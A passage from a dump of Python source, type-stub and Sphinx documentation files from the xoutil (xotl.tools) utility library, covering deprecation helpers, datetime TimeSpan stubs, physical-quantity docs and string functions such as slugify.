replacement=repl_name, in_version=in_version\n ),\n stacklevel=2,\n )\n try:\n return target.__new__(*args, **kwargs)\n except TypeError:\n # XXX: Some classes in Python 3 don't declare an\n # equivalent '__new__'\n return super(result, args[0]).__new__(args[0])\n\n # Code copied and adapted from xotl.tools.objects.copy_class.\n # This is done so because this module *must* not depends on any\n # other, otherwise an import cycle might be formed when\n # deprecating a class in xotl.tools.objects.\n from xotl.tools.future.types import MemberDescriptorType\n\n meta = type(target)\n td = target.__dict__\n iteritems = td.items\n attrs = {\n name: value\n for name, value in iteritems()\n if name\n not in (\"__class__\", \"__mro__\", \"__name__\", \"__weakref__\", \"__dict__\")\n # Must remove member descriptors, otherwise the old's\n # class descriptor will override those that must be\n # created here.\n if not isinstance(value, MemberDescriptorType)\n }\n attrs.update(__new__=new)\n result = meta(target_name, target.__bases__, attrs)\n return result\n else:\n\n @wraps(target)\n def inner(*args, **kw):\n if check_version and removed_in_version:\n raise_if_deprecated(target, removed_in_version)\n warnings.warn(\n msg.format(\n funcname=funcname, replacement=repl_name, in_version=in_version\n ),\n stacklevel=2,\n )\n return target(*args, **kw)\n\n if new_name:\n inner.__name__ = new_name\n return inner\n\n return decorator\n\n\ndef import_deprecated(module, *names, **aliases):\n \"\"\"Import functions deprecating them in the target module.\n\n The target module is the caller of this function (only intended to be\n called in the global part of a module).\n\n :param module: The module from which functions will be imported. 
Could be\n a string, or an imported module.\n\n :param names: The names of the functions to import.\n\n :param aliases: Keys are the new names, values the old names.\n\n For example::\n\n >>> from xotl.tools.deprecation import import_deprecated\n >>> import math\n >>> import_deprecated(math, 'sin', new_cos='cos')\n >>> sin is not math.sin\n True\n\n Next examples are all ``True``, but them print the deprecation warning\n when executed::\n\n >>> sin(math.pi/2) == 1.0\n >>> new_cos(2*math.pi) == math.cos(2*math.pi)\n\n If no identifier is given, it is assumed equivalent as ``from module\n import *``.\n\n The statement ``import_deprecated('math', 'sin', new_cos='cos')`` has the\n same semantics as ``from math import sin, cos as new_cos``, but\n deprecating current module symbols.\n\n This function is provided for easing the deprecation of whole modules and\n should not be used to do otherwise.\n\n \"\"\"\n from xotl.tools.future.types import func_types\n from xotl.tools.modules import force_module\n\n src = force_module(module)\n dst = force_module(2)\n src_name = src.__name__\n dst_name = dst.__name__\n dst = force_module(2)\n if not names and not aliases:\n # from module import *\n names = getattr(src, \"__all__\", None)\n if not names:\n names = (n for n in dir(src) if not n.startswith(\"_\"))\n for name in names:\n if name not in aliases:\n aliases[name] = name\n else:\n msg = 'import_deprecated(): invalid repeated argument \"{}\"'\n raise ValueError(msg.format(name))\n unset = object()\n test_classes = func_types + (type,)\n for alias in aliases:\n name = aliases[alias]\n target = getattr(src, name, unset)\n if target is not unset:\n if isinstance(target, test_classes):\n replacement = src_name + \".\" + name\n deprecator = deprecated(\n replacement, DEFAULT_MSG, dst_name, new_name=alias\n )\n target = deprecator(target)\n setattr(dst, alias, target)\n else:\n msg = \"cannot import '{}' from '{}'\"\n raise ImportError(msg.format(name, src_name))\n\n\ndef 
deprecate_linked(check=None, msg=None):\n \"\"\"Deprecate an entire module if used through a link.\n\n This function must be called in the global context of the new module.\n\n :param check: Must be a module name to check, it must be part of the\n actual module name. If not given 'xotl.tools.future' is assumed.\n\n For example::\n\n >>> from xotl.tools.deprecation import deprecate_linked\n >>> deprecate_linked()\n >>> del deprecate_linked\n\n \"\"\"\n import inspect\n\n check = check or \"xotl.tools.future\"\n frame = inspect.currentframe().f_back\n try:\n name = frame.f_globals.get(\"__name__\")\n finally:\n # As recommended in Python's documentation to avoid memory leaks\n del frame\n if check not in name:\n if msg is None:\n msg = (\n '\"{}\" module is now deprecated and it will be removed; use '\n 'the one in \"{}\" instead.'\n ).format(name, check)\n warnings.warn(msg, stacklevel=2)\n\n\ndef deprecate_module(replacement, msg=None):\n \"\"\"Deprecate an entire module.\n\n This function must be called in the global context of the deprecated\n module.\n\n :param replacement: The name of replacement module.\n\n For example::\n\n >>> from xotl.tools.deprecation import deprecate_module\n >>> deprecate_module('xotl.tools.symbols')\n >>> del deprecate_module\n\n \"\"\"\n import inspect\n\n frame = inspect.currentframe().f_back\n try:\n name = frame.f_globals.get(\"__name__\")\n finally:\n # As recommended in Python's documentation to avoid memory leaks\n del frame\n if msg is None:\n msg = (\n '\"{}\" module is now deprecated and it will be removed; ' 'use \"{}\" instead.'\n ).format(name, replacement)\n if msg:\n warnings.warn(msg, stacklevel=2)\n\n\n@deprecated(import_deprecated)\ndef inject_deprecated(funcnames, source, target=None):\n \"\"\"Injects a set of functions from a module into another.\n\n The functions will be marked as deprecated in the target module.\n\n :param funcnames: function names to take from the source module.\n\n :param source: the module 
where the functions resides.\n\n :param target: the module that will contains the deprecated functions. If\n ``None`` will be the module calling this function.\n\n This function is provided for easing the deprecation of whole modules and\n should not be used to do otherwise.\n\n .. deprecated:: 1.8.0 Use `import_deprecated`:func:.\n\n \"\"\"\n if not target:\n import sys\n\n frame = sys._getframe(1)\n try:\n target_locals = frame.f_locals\n finally:\n # As recommended to avoid memory leaks\n del frame\n else:\n # FIX: @manu, there is a consistency error here, 'target_locals' is\n # never assigned\n pass\n for targetname in funcnames:\n unset = object()\n target = getattr(source, targetname, unset)\n if target is not unset:\n testclasses = (types.FunctionType, types.LambdaType, type)\n if isinstance(target, testclasses):\n replacement = source.__name__ + \".\" + targetname\n module_name = target_locals.get(\"__name__\", None)\n target_locals[targetname] = deprecated(\n replacement, DEFAULT_MSG, module_name\n )(target)\n else:\n target_locals[targetname] = target\n else:\n warnings.warn(\n \"{targetname} was expected to be in {source}\".format(\n targetname=targetname, source=source.__name__\n ),\n stacklevel=2,\n )\n\n\ndef deprecated_alias(f, **kwargs):\n \"\"\"Declare a deprecated alias.\n\n This is roughly the same as ``deprecated(f)(f)``; which is makes it\n convenient to give a better name to an already released function `f`,\n while keeping the old name as a deprecated alias.\n\n .. 
versionadded:: 2.1.0\n\n \"\"\"\n return deprecated(f, **kwargs)(f)\n" }, { "alpha_fraction": 0.5886897444725037, "alphanum_fraction": 0.5886897444725037, "avg_line_length": 40.487178802490234, "blob_id": "2bd24c6564eb3464e8884a6ea1d3d8d53e084583", "content_id": "9920b4d3c495b99b6569c64d17861e22505bb02f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3236, "license_type": "no_license", "max_line_length": 84, "num_lines": 78, "path": "/xotl/tools/future/datetime.pyi", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "from datetime import *\nfrom typing import *\n\ndef new_date(d: date) -> date: ...\ndef new_datetime(d: date) -> datetime: ...\ndef strfdelta(delta: timedelta) -> str: ...\ndef strftime(dt: date, fmt: str) -> str: ...\ndef parse_date(value: str = None) -> date: ...\ndef parse_datetime(value: str = None) -> datetime: ...\ndef get_month_first(ref: date = None) -> date: ...\ndef get_month_last(ref: date = None) -> date: ...\ndef get_next_month(ref: date = None, lastday: bool = False) -> date: ...\ndef is_full_month(start: date, end: date) -> bool: ...\n\nclass flextime(timedelta):\n @classmethod\n def parse_simple_timeformat(cls, which: str) -> Tuple[int, int, int]: ...\n\nclass TimeSpan:\n start_date: Optional[date]\n end_date: Optional[date]\n def __init__(\n self, start_date: Union[str, date] = None, end_date: Union[str, date] = None\n ) -> None: ...\n @classmethod\n def from_date(self, date: date) -> \"TimeSpan\": ...\n @property\n def past_unbound(self) -> bool: ...\n @property\n def future_unbound(self) -> bool: ...\n @property\n def unbound(self) -> bool: ...\n @property\n def bound(self) -> bool: ...\n @property\n def valid(self) -> bool: ...\n def __contains__(self, other: date) -> bool: ...\n def overlaps(self, other: \"TimeSpan\") -> bool: ...\n def isdisjoint(self, other: \"TimeSpan\") -> bool: ...\n def __le__(self, other: \"TimeSpan\") -> bool: ...\n def 
issubset(self, other: \"TimeSpan\") -> bool: ...\n def __lt__(self, other: \"TimeSpan\") -> bool: ...\n def __gt__(self, other: \"TimeSpan\") -> bool: ...\n def __ge__(self, other: \"TimeSpan\") -> bool: ...\n def covers(self, other: \"TimeSpan\") -> bool: ...\n def issuperset(self, other: \"TimeSpan\") -> bool: ...\n def __iter__(self) -> Iterator[date]: ...\n def __getitem__(self, index: int) -> date: ...\n def __eq__(self, other: Union[date, \"TimeSpan\"]) -> bool: ...\n def __and__(self, other: \"TimeSpan\") -> \"TimeSpan\": ...\n def __lshift__(self, delta: Union[int, timedelta]) -> \"TimeSpan\": ...\n def __rshift__(self, delta: Union[int, timedelta]) -> \"TimeSpan\": ...\n def intersection(self, *others: \"TimeSpan\") -> \"TimeSpan\": ...\n def diff(self, other: \"TimeSpan\") -> Tuple[TimeSpan, TimeSpan]: ...\n\nclass DateTimeSpan(TimeSpan):\n start_datetime: Optional[datetime]\n end_datetime: Optional[datetime]\n def __init__(\n self,\n start_datetime: Union[str, date] = None,\n end_datetime: Union[str, date] = None,\n ) -> None: ...\n @classmethod\n def from_date(self, d: date) -> \"DateTimeSpan\": ...\n @classmethod\n def from_datetime(self, dt: datetime) -> \"DateTimeSpan\": ...\n @classmethod\n def from_timespan(self, ts: TimeSpan) -> \"DateTimeSpan\": ...\n def __iter__(self) -> Iterator[datetime]: ...\n def __getitem__(self, index: int) -> datetime: ...\n def __and__(self, other: TimeSpan) -> \"DateTimeSpan\": ...\n def __lshift__(self, delta: Union[int, timedelta]) -> \"DateTimeSpan\": ...\n def __rshift__(self, delta: Union[int, timedelta]) -> \"DateTimeSpan\": ...\n def intersection(self, *others: TimeSpan) -> \"DateTimeSpan\": ...\n def diff(self, other: TimeSpan) -> Tuple[\"DateTimeSpan\", \"DateTimeSpan\"]: ...\n\nEmptyTimeSpan: DateTimeSpan\n" }, { "alpha_fraction": 0.5742870569229126, "alphanum_fraction": 0.5775068998336792, "avg_line_length": 16.392000198364258, "blob_id": "e1b6eeeb0cef0c3185327eeeb4ed18ba0985afe8", "content_id": 
"d135312d6a72a3ed82ef7c8aa96dc5d21548cf33", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4349, "license_type": "permissive", "max_line_length": 76, "num_lines": 250, "path": "/docs/source/xotl.tools/dim/base.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "==============================================================\n `xotl.tools.dim.base`:mod: - The base `physical quantities`_\n==============================================================\n\n.. automodule:: xotl.tools.dim.base\n\n.. autoclass:: Length\n\n The Length base quantity.\n\n .. attribute:: metre\n\n The canonical unit.\n\n .. attribute:: m\n\n An alias of `metre`:attr:\n\n Other attributes:\n\n .. attribute:: kilometre\n .. attribute:: km\n .. attribute:: centimetre\n .. attribute:: cm\n .. attribute:: millimetre\n .. attribute:: mm\n .. attribute:: nanometre\n .. attribute:: nm\n\n\n.. autoclass:: Time\n\n The Time base quantity.\n\n .. attribute:: second\n\n The canonical unit.\n\n .. attribute:: s\n\n An alias of `second`:attr:\n\n Other attributes:\n\n .. attribute:: millisecond\n .. attribute:: ms\n .. attribute:: nanosecond\n .. attribute:: ns\n .. attribute:: minute\n .. attribute:: hour\n\n\n.. autoclass:: Mass\n\n The Mass base quantity.\n\n .. attribute:: kilogram\n\n The canonical unit.\n\n .. attribute:: kg\n\n An alias of `kilogram`:attr:\n\n Other attributes:\n\n .. attribute:: gram\n\n\n.. autoclass:: ElectricCurrent\n\n The electrical current base quantity.\n\n .. attribute:: ampere\n\n The canonical unit.\n\n .. attribute:: A\n\n An alias of `ampere`:attr:\n\n\n.. autoclass:: Temperature\n\n The thermodynamic temperature base quantity.\n\n .. attribute:: kelvin\n\n The canonical unit.\n\n .. attribute:: K\n\n An alias of `kelvin`:attr:\n\n\n .. automethod:: from_celcius\n\n .. automethod:: from_fahrenheit\n\n\n.. 
autoclass:: Substance\n\n The amount of substance.\n\n .. attribute:: mole\n\n .. attribute:: mol\n\n An alias of `mole`:attr:.\n\n\n.. autoclass:: Luminosity\n\n The luminous intensity base quantity.\n\n .. attribute:: candela\n\n\n\nAliases\n=======\n\n.. class:: L\n\n An alias of `Length`:class:\n\n\n.. class:: T\n\n An alias of `Time`:class:\n\n\n.. class:: M\n\n An alias of `Mass`:class:\n\n\n.. class:: I\n\n An alias of `ElectricCurrent`:class:\n\n\n.. class:: O\n\n An alias of `Temperature`:class:. We can't really use the Greek Theta Θ\n\n\n.. class:: N\n\n An alias of `Substance`:class:\n\n\n.. class:: J\n\n An alias of `Luminosity`:class:\n\n\n\nDerived quantities\n==================\n\n.. class:: Area\n\n Defined as `L`:class:\\ ``**2``.\n\n .. attribute:: metre_squared\n\n The canonical unit.\n\n.. class:: Volume\n\n Defined as `L`:class:\\ ``**3``.\n\n .. attribute:: metre_cubic\n\n The canonical unit.\n\n\n.. class:: Frequency\n\n Defined as `T`:class:\\ ``**-1`` (which is the same as ``1/T``).\n\n .. attribute:: unit_per_second\n\n The canonical unit.\n\n Aliases of the canonical unit:\n\n .. attribute:: Hz\n\n\n.. class:: Force\n\n Defined as `L`:class: ``*`` `M`:class: ``*`` `T`:class:\\ ``**-2``.\n\n .. attribute:: metre_kilogram_per_second_squared\n\n The canonical unit.\n\n Aliases of the canonical unit:\n\n .. attribute:: N\n .. attribute:: Newton\n\n.. class:: Presure\n\n Defined as `L`:class:\\ ``**-1 *`` `M`:class: ``*`` `T`:class:\\ ``**-2``.\n\n .. attribute:: kilogram_per_metre_per_second_squared\n\n Aliases of the canonical unit:\n\n .. attribute:: pascal\n .. attribute:: Pa\n\n.. class:: Velocity\n\n Defined as `L`:class: ``*`` `T`:class:\\ ``**-1``.\n\n .. attribute:: metre_per_second\n\n The canonical unit.\n\n.. class:: Acceleration\n\n Defined as `L`:class: ``*`` `T`:class:\\ ``**-2``.\n\n .. 
attribute:: metre_per_second_squared\n\n The canonical unit.\n\n\nOn the automatically created names for derived quantities\n=========================================================\n\nWe automatically create the name of the canonical unit of quantities derived\nfrom others by simple rules:\n\n- ``A * B`` joins the canonical unit names together with a low dash '_'\n in-between. Let's represent it as `a_b`, where `a` stands for the name of\n the canonical unit of ``A`` and `b`, the canonical unit of ``B``.\n\n For the case, ``A * A`` the unit name is `a_squared`.\n\n- ``A/B`` gets the name `a_per_b`. ``1/A`` gets the name `unit_per_a`\n\n- ``A**n``; when ``n=1`` this is the same as ``A``; when ``n=2`` this is the\n same as ``A * A``; for other positive values of ``n``, the canonical unit\n name is `a_pow_n`; for negative values of ``n`` is the same as ``1/A**n``;\n for ``n=0`` this is the `~xotl.tools.dim.meta.Scalar`:class: quantity.\n" }, { "alpha_fraction": 0.6081946492195129, "alphanum_fraction": 0.6235595345497131, "avg_line_length": 23.40625, "blob_id": "793c49b8e3b27071d9a1c29d5e43b7e9c2e46ab3", "content_id": "a7ea33b2f3f2e874964bc5df66408bd514885bd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 781, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/xotl/tools/future/contextlib.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Python Software Foundation\n# All rights reserved.\n#\n# Most of the contents of this file were extracted from the source code of\n# CPython 3.6.\n#\n\n\"\"\"Utilities for `with-statement contexts <343>`:pep:.\n\nThis module re-export all symbols from the standard library, with the\nexception of the function `nested`.\n\n.. 
versionadded:: 1.9.5\n\n\"\"\"\n\nimport contextlib as _stdlib # noqa\nfrom contextlib import * # noqa\n\n__all__ = list(getattr(_stdlib, \"__all__\", []))\n\n\ntry:\n # New in version 3.5 of standard library.\n redirect_stderr # noqa\nexcept NameError:\n from contextlib2 import redirect_stderr # noqa\n\n __all__.append(\"redirect_stderr\")\n" }, { "alpha_fraction": 0.6898047924041748, "alphanum_fraction": 0.7570499181747437, "avg_line_length": 40.90909194946289, "blob_id": "1319d415a8c9dd81913f0cd5826a89fc599ee366", "content_id": "5498339e2817aa5b2f5f23cfd538399625d8abf2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 461, "license_type": "permissive", "max_line_length": 85, "num_lines": 11, "path": "/docs/source/history/_changes-1.7.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecate `xoutil.dim.meta.Signature.isunit`:meth:.\n\n- Rename `xoutil.dim.meta.QuantityType`:class: to\n `xoutil.dim.meta.Dimension`:class:.\n\n- Fix bug__ in `xoutil.datetime.TimeSpan`:class:.\n `~xoutil.datetime.TimeSpan.start_date`:attr: and\n `~xoutil.datetime.TimeSpan.end_date`:attr: now return an instance of\n Python's `datetime.date`:class: instead of a sub-class.\n\n__ https://github.com/merchise/xoutil/commit/9948d480da994212182ff7c4c865e8588e394952\n" }, { "alpha_fraction": 0.6126172542572021, "alphanum_fraction": 0.6195886135101318, "avg_line_length": 32.29226303100586, "blob_id": "44f1cd4d67e5340aaa89de2b310921b4ee85c09a", "content_id": "fcef9d7984a0008d895fb5048b414c9db16e8cff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11627, "license_type": "no_license", "max_line_length": 86, "num_lines": 349, "path": "/xotl/tools/string.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: 
utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some additions for `string` standard module.\n\nIn Python 3 `str` is always unicode but `unicode` and `basestring` types\ndoesn't exists. `bytes` type can be used as an array of one byte each item.\n\n\"\"\"\n\n\nfrom xotl.tools.deprecation import deprecated # noqa\nfrom xotl.tools.deprecation import import_deprecated # noqa\n\n\n_MIGRATED_TO_CODECS = (\"force_encoding\", \"safe_decode\", \"safe_encode\")\n\nimport_deprecated(\"xotl.tools.future.codecs\", *_MIGRATED_TO_CODECS)\n\n\n@deprecated\ndef safe_strip(value):\n \"\"\"Removes the leading and tailing space-chars from `value` if string, else\n return `value` unchanged.\n\n \"\"\"\n return value.strip() if isinstance(value, str) else value\n\n\n# TODO: Functions starting with 'cut_' must be reviewed, maybe migrated to\n# some module dedicated to \"string trimming\".\ndef cut_prefix(value, prefix):\n \"\"\"Removes the leading `prefix` if exists, else return `value`\n unchanged.\n\n \"\"\"\n from xotl.tools.future.codecs import safe_encode, safe_decode\n\n if isinstance(value, str) and isinstance(prefix, bytes):\n prefix = safe_decode(prefix)\n elif isinstance(value, bytes) and isinstance(prefix, str):\n prefix = safe_encode(prefix)\n return value[len(prefix) :] if value.startswith(prefix) else value\n\n\ndef cut_any_prefix(value, *prefixes):\n \"\"\"Apply `cut_prefix`:func: for the first matching prefix.\"\"\"\n result = prev = value\n i, top = 0, len(prefixes)\n while i < top and result == prev:\n prefix, i = prefixes[i], i + 1\n prev, result = result, cut_prefix(prev, prefix)\n return result\n\n\ndef cut_prefixes(value, *prefixes):\n \"\"\"Apply `cut_prefix`:func: for all provided prefixes in order.\"\"\"\n result = value\n for prefix in prefixes:\n result = 
cut_prefix(result, prefix)\n return result\n\n\ndef cut_suffix(value, suffix):\n \"\"\"Removes the tailing `suffix` if exists, else return `value`\n unchanged.\n\n \"\"\"\n from xotl.tools.future.codecs import safe_decode, safe_encode\n\n if isinstance(value, str) and isinstance(suffix, bytes):\n suffix = safe_decode(suffix)\n elif isinstance(value, bytes) and isinstance(suffix, str):\n suffix = safe_encode(suffix)\n # Since value.endswith('') is always true but value[:-0] is actually\n # always value[:0], which is always '', we have to explictly test for\n # len(suffix)\n if len(suffix) > 0 and value.endswith(suffix):\n return value[: -len(suffix)]\n else:\n return value\n\n\ndef cut_any_suffix(value, *suffixes):\n \"\"\"Apply `cut_suffix`:func: for the first matching suffix.\"\"\"\n result = prev = value\n i, top = 0, len(suffixes)\n while i < top and result == prev:\n suffix, i = suffixes[i], i + 1\n prev, result = result, cut_suffix(prev, suffix)\n return result\n\n\ndef cut_suffixes(value, *suffixes):\n \"\"\"Apply `cut_suffix`:func: for all provided suffixes in order.\"\"\"\n result = value\n for suffix in suffixes:\n result = cut_suffix(result, suffix)\n return result\n\n\ndef force_ascii(value, encoding=None):\n \"\"\"Return the string normal form for the `value`\n\n Convert all non-ascii to valid characters using unicode 'NFKC'\n normalization.\n\n :param encoding: If `value` is not unicode, it is decoded before ASCII\n normalization using this encoding. If not provided use the return\n of `~xotl.tools.future.codecs.force_encoding`:func:.\n\n .. versionchanged:: 1.8.7 Add parameter 'encoding'.\n\n .. 
versionchanged:: 2.1.0 Moved to `xotl.tools.string`:mod:.\n\n \"\"\"\n import unicodedata\n from xotl.tools.future.codecs import safe_decode\n\n ASCII, IGNORE = \"ascii\", \"ignore\"\n if not isinstance(value, str):\n value = safe_decode(value, encoding=encoding)\n res = unicodedata.normalize(\"NFKD\", value).encode(ASCII, IGNORE)\n return str(res, ASCII, IGNORE)\n\n\ndef slugify(value, *args, **kwds):\n \"\"\"Return the normal-form of a given string value that is valid for slugs.\n\n Convert all non-ascii to valid characters, whenever possible, using\n unicode 'NFKC' normalization and lower-case the result. Replace unwanted\n characters by the value of `replacement` (remove extra when repeated).\n\n Default valid characters are ``[_a-z0-9]``. Extra arguments\n `invalid_chars` and `valid_chars` can modify this standard behaviour, see\n next:\n\n :param value: The source value to slugify.\n\n :param replacement: A character to be used as replacement for unwanted\n characters. Could be both, the first extra positional argument, or\n as a keyword argument. Default value is a hyphen ('-').\n\n There will be a contradiction if this argument contains any invalid\n character (see `invalid_chars`). ``None``, or ``False``, will be\n converted converted to an empty string for backward compatibility\n with old versions of this function, but not use this, will be\n deprecated.\n\n :param invalid_chars: Characters to be considered invalid. There is a\n default set of valid characters which are kept in the resulting\n slug. Characters given in this parameter are removed from the\n resulting valid character set (see `valid_chars`).\n\n Extra argument values can be used for compatibility with\n `invalid_underscore` argument in deprecated `normalize_slug`\n function:\n\n - ``True`` is a synonymous of underscore ``\"_\"``.\n\n - ``False`` or ``None``: An empty set.\n\n Could be given as a name argument or in the second extra positional\n argument. 
Default value is an empty set.\n\n :param valid_chars: A collection of extra valid characters. Could be\n either a valid string, any iterator of strings, or ``None`` to use\n only default valid characters. Non-ASCII characters are ignored.\n\n :param encoding: If `value` is not a text (unicode), it is decoded before\n `ASCII normalization <force_ascii>`:func:.\n\n Examples::\n\n >>> slugify(' Á.e i Ó u ') == 'a-e-i-o-u'\n True\n\n >>> slugify(' Á.e i Ó u ', '.', invalid_chars='AU') == 'e.i.o'\n True\n\n >>> slugify(' Á.e i Ó u ', valid_chars='.') == 'a.e-i-o-u'\n True\n\n >>> slugify('_x', '_') == '_x'\n True\n\n >>> slugify('-x', '_') == 'x'\n True\n\n >>> slugify(None) == 'none'\n True\n\n >>> slugify(1 == 1) == 'true'\n True\n\n >>> slugify(1.0) == '1-0'\n True\n\n >>> slugify(135) == '135'\n True\n\n >>> slugify(123456, '', invalid_chars='52') == '1346'\n True\n\n >>> slugify('_x', '_') == '_x'\n True\n\n .. versionchanged:: 1.5.5 Added the `invalid_underscore` parameter.\n\n .. versionchanged:: 1.6.6 Replaced the `invalid_underscore` paremeter by\n `invalids`. Added the `valids` parameter.\n\n .. versionchanged:: 1.7.2 Clarified the role of `invalids` with regards to\n `replacement`.\n\n .. versionchanged:: 1.8.0 Deprecate the `invalids` paremeter name in favor\n of `invalid_chars`, also deprecate the `valids` paremeter name in favor\n of `valid_chars`.\n\n .. versionchanged:: 1.8.7 Add parameter 'encoding'.\n\n .. 
versionchanged:: 2.1.0 Remove deprecated parameters `invalids` and\n `valids`.\n\n \"\"\"\n import re\n from xotl.tools.params import ParamManager\n\n from xotl.tools.values import compose, istype\n from xotl.tools.values.simple import not_false, ascii_coerce\n\n _str = compose(not_false(\"\"), istype(str))\n _ascii = compose(_str, ascii_coerce)\n _set = compose(_ascii, lambda v: \"\".join(set(v)))\n\n # local functions\n def _normalize(v):\n return force_ascii(v, encoding=encoding).lower()\n\n def _set(v):\n return re.escape(\"\".join(set(_normalize(v))))\n\n getarg = ParamManager(args, kwds)\n replacement = getarg(\"replacement\", 0, default=\"-\", coercers=(str,))\n invalid_chars = getarg(\"invalid_chars\", \"invalid\", 0, default=\"\", coercers=_ascii)\n valid_chars = getarg(\"valid_chars\", \"valid\", 0, default=\"\", coercers=_ascii)\n encoding = getarg(\"encoding\", default=None)\n replacement = args[0] if args else kwds.pop(\"replacement\", \"-\")\n # TODO: check unnecessary arguments, raising errors\n if replacement in (None, False):\n # for backward compatibility\n replacement = \"\"\n elif isinstance(replacement, str):\n replacement = _normalize(replacement)\n else:\n raise TypeError(\n 'slugify() replacement \"{}\" must be a string or None,'\n ' not \"{}\".'.format(replacement, type(replacement))\n )\n if invalid_chars is True:\n # Backward compatibility with former `invalid_underscore` argument\n invalid_chars = \"_\"\n elif invalid_chars in {None, False}:\n invalid_chars = \"\"\n else:\n if not isinstance(invalid_chars, str):\n invalid_chars = \"\".join(invalid_chars)\n invalid_chars = _set(invalid_chars)\n if invalid_chars:\n invalid_regex = re.compile(r\"[{}]+\".format(invalid_chars))\n if invalid_regex.search(replacement):\n raise ValueError(\n 'slugify() replacement \"{}\" must not contain '\n \"any invalid character.\".format(replacement)\n )\n else:\n invalid_regex = None\n if valid_chars is None:\n valid_chars = \"\"\n else:\n if not 
isinstance(valid_chars, str):\n valid_chars = \"\".join(valid_chars)\n valid_chars = _set(valid_chars)\n valid_chars = _set(re.sub(r\"[0-9a-z]+\", \"\", valid_chars))\n valid_chars = re.compile(r\"[^_0-9a-z{}]+\".format(valid_chars))\n # calculate result\n repl = \"\\t\" if replacement else \"\"\n res = valid_chars.sub(repl, _normalize(value))\n if invalid_regex:\n res = invalid_regex.sub(repl, res)\n if repl:\n # convert two or more replacements in only one instance\n r = r\"{}\".format(re.escape(repl))\n res = re.sub(r\"({r}){{2,}}\".format(r=r), repl, res)\n # remove start and end more replacement instances\n res = re.sub(r\"(^{r}+|{r}+$)\".format(r=r), \"\", res)\n res = re.sub(r\"[\\t]\", replacement, res)\n return res\n\n\ndef error2str(error):\n \"\"\"Convert an error to string.\"\"\"\n if isinstance(error, str):\n return error\n elif isinstance(error, BaseException):\n tname = type(error).__name__\n res = str(error)\n if tname in res:\n return res\n else:\n return \": \".join((tname, res)) if res else tname\n elif isinstance(error, type) and issubclass(error, BaseException):\n return error.__name__\n else:\n prefix = str(\"unknown error: \")\n cls = error if isinstance(error, type) else type(error) # force type\n tname = cls.__name__\n if cls is error:\n res = tname\n else:\n res = str(error)\n if tname not in res:\n res = str(\"{}({})\").format(tname, res) if res else tname\n return prefix + res\n\n\ndef make_a10z(string):\n \"\"\"Utility to find out that \"internationalization\" is \"i18n\".\n\n Examples::\n\n >>> print(make_a10z('parametrization'))\n p13n\n \"\"\"\n return string[0] + str(len(string[1:-1])) + string[-1]\n\n\n@deprecated(slugify)\ndef normalize_slug(value, *args, **kwds):\n return slugify(value, *args, **kwds)\n\n\ndel deprecated, import_deprecated\n" }, { "alpha_fraction": 0.6445229649543762, "alphanum_fraction": 0.6614841222763062, "avg_line_length": 34.375, "blob_id": "ae566be279f55d3de03305fd4725a35e9e91f822", "content_id": 
"d8febc61ad00bed4f1b00771e35315e43e0d002e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1415, "license_type": "permissive", "max_line_length": 76, "num_lines": 40, "path": "/docs/source/xotl.tools/fs.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fs`:mod: -- file system utilities\n=============================================\n\n.. automodule:: xotl.tools.fs\n :members: ensure_filename, imap, iter_dirs, iter_files,\n\t listdir, rmdirs, stat, walk_up\n\n.. autofunction:: concatfiles(*files, target)\n\n.. function:: makedirs(path, mode=0o777, exist_ok=False)\n\n Recursive directory creation function. Like `os.mkdir`:func:, but makes\n all intermediate-level directories needed to contain the leaf directory.\n\n The default *mode* is ``0o777`` (octal). On some systems, *mode* is\n ignored. Where it is used, the current umask value is first masked out.\n\n If *exist_ok* is ``False`` (the default), an `OSError`:exc: is raised if\n the target directory already exists.\n\n .. note:: `makedirs`:func: will become confused if the path elements to\n create include `os.pardir`:py:data: (eg. \"..\" on UNIX systems).\n\n This function handles UNC paths correctly.\n\n .. versionchanged:: 1.6.1 Behaves as Python 3.4.1.\n\n Before Python 3.4.1 (ie. xotl.tools 1.6.1), if *exist_ok* was ``True``\n and the directory existed, `makedirs`:func: would still raise an error\n if *mode* did not match the mode of the existing directory. Since this\n behavior was impossible to implement safely, it was removed in Python\n 3.4.1. See the original `os.makedirs`:py:func:.\n\n\nContents:\n\n.. 
